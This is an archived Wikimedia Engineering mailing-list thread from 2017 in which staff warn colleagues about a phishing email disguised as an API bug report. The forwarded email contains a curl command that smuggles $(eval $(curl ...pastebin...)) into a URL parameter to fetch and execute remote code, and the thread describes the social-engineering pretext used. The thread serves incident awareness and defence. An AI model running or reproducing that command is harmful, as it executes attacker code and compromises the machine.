[Engineering] PLEASE READ: (unsuccesful) compromise attempt
C. Scott Ananian
cananian at wikimedia.org
Thu Jun 15 19:26:56 UTC 2017
I was the original recipient of such an email (with a different URL) and
deliberately forwarded it to security@ *without clicking the link*, for
exactly this reason. My browser is logged in to various accounts and I
don't have a proper sandbox to use to be clicking random links I receive on
the internet.
Anyway. It's worth reiterating to staff: don't try to investigate an
alleged "security issue" yourself, unless you are properly equipped to do
so. The internet is a dangerous place. Forward to security at .
--scott
On Thu, Jun 15, 2017 at 3:15 PM, Aeryn Palmer <apalmer at wikimedia.org> wrote:
> This appears to be from the same person who sent the email earlier this
> morning about an alleged leak, to whom Chad responded. Did anyone click the
> link they provided in that email?
>
> Cheers,
>
> Aeryn
>
> On Thu, Jun 15, 2017 at 12:12 PM, Faidon Liambotis <faidon at wikimedia.org>
> wrote:
>
>> Hi,
>>
>> DO NOT RUN THE COMMAND BELOW. Please read this email in full.
>>
>> I just got an email, foundd below, which seems initially legitimate, but
>> on a more careful read is malicious and an attempt to compromise my
>> computer. Thankfully I don't have the habit of copy/pasting commands on
>> my terminal and I read this email carefully, so I was not a victim of
>> this.
>>
>> The email seems innocuous enough, by mentioning my name and an otherwise
>> legitimate body pointing an API issue with a URL that looks like an
>> api.php URL of ours. It suggests running a curl to reproduce, but if you
>> look more carefully, that curl has $(eval $(curl
>> https://pastebin.com/raw/xSWbdNAK) in it.
>>
>> That pastebin URL above contains an exec() of a base64 string, which, in
>> turn, decoded, is a Python script that fetches and exec()s the contents
>> of a URL. I have NOT fetched that URL yet, so I don't know what the
>> contents are. I'd advise to not do that either, unless done carefully
>> from a sandboxed, unprivileged environment. It will also likely let the
>> attacker know that someone accessed it, and possibly let them know that
>> we're on to them.
>>
>> Please be on the lookout for similar attempts, and let security@ and ops
>> know immediately if you get similar ones, or if you are suspicious of
>> any other emails or weird behavior on your computer. Please also let us
>> know IMMEDIATELY if you suspect you fell victim of one of these attacks.
>> Make sure to confirm that your message was received. If in doubt, call
>> me or other opsens on our cellphones, as found on officewiki's
>> Contact_list.
>>
>> We also had a targeted phising attempt last week, by someone pertaining
>> to be Katherine and attempting to extract donor data, so it's possible
>> it's the same person trying a different angle. They may try another
>> angles as well, so I'd advise everyone to be vigilant.
>>
>> Best,
>> Faidon
>> --
>> Faidon Liambotis
>> Principal Operations Engineer
>> Wikimedia Foundation
>>
>>
>>
>> ----- Forwarded message from Joshua Wilson <joshuaswillson at gmail.com>
>> -----
>>
>> Date: Thu, 15 Jun 2017 10:45:35 -0700
>> From: Joshua Wilson <joshuaswillson at gmail.com>
>> To: fliambotis at wikimedia.org
>> Subject: Wikipedia REST API Issues
>>
>> Greetings Faidon,
>>
>>
>> It seems as if the api `query` endpoint at the English Wikipedia is down.
>> A
>> simple "hello"
>> api call as shown below responds with an internal server error. Further
>> calls to the same
>> endpoint result in the request timing out, until the endpoint is reachable
>> again.
>>
>> [added by faidon: DO NOT RUN THIS COMMAND]
>> curl https://en.wikipedia.org/w/api.php?action=query\&titles=$(eval
>> $(curl
>> https://pastebin.com/raw/xSWbdNAK)
>> \\\&)Main%20Page\&prop=revisions\&rvprop=content\&format=json
>> [added by faidon: DO NOT RUN THIS COMMAND]
>>
>> I'm interested in using english wikipedia data for some AI language
>> comprehension research.
>>
>> If you could take a look, and possibly let me know if/when this service
>> will be up, I would
>> greatly appreciate it. I couldn't find any scheduled downtime information
>> online, so I apologize
>> if this behavior is expected.
>>
>> Thanks,
>>
>> Chelsea Anders
>>
>> ----- End forwarded message -----
>>
>
>
>
> --
> Aeryn Palmer
> Legal Counsel
> Wikimedia Foundation
> 149 New Montgomery Street, 6th Floor
> San Francisco, CA 94105
> apalmer at wikimedia.org
> 415.839.6885 <(415)%20839-6885> (Office)
> 415.882.0495 <(415)%20882-0495> (Fax)
> *California Registered In-House Counsel*
>
> *NOTICE: This message may be confidential or legally privileged. If you
> have received it by accident, please delete it and let us know about the
> mistake. As an attorney for the Wikimedia Foundation and for legal/ethical
> reasons, I cannot give legal advice to, or serve as a lawyer for, community
> members, volunteers, or staff members in their personal capacity. For more
> on what this means, please see our legal disclaimer
> <https://meta.wikimedia.org/wiki/Wikimedia_Legal_Disclaimer>.*
>
> _______________________________________________
> Engineering mailing list
> Engineering at lists.wikimedia.org
> https://lists.wikimedia.org/mailman/listinfo/engineering
>
>
--
(http://cscott.net)
-------------- next part --------------
An HTML attachment was scrubbed...
URL: <https://lists.wikimedia.org/pipermail/engineering/attachments/20170615/a0a168bf/attachment-0001.html>
More information about the Engineering
mailing list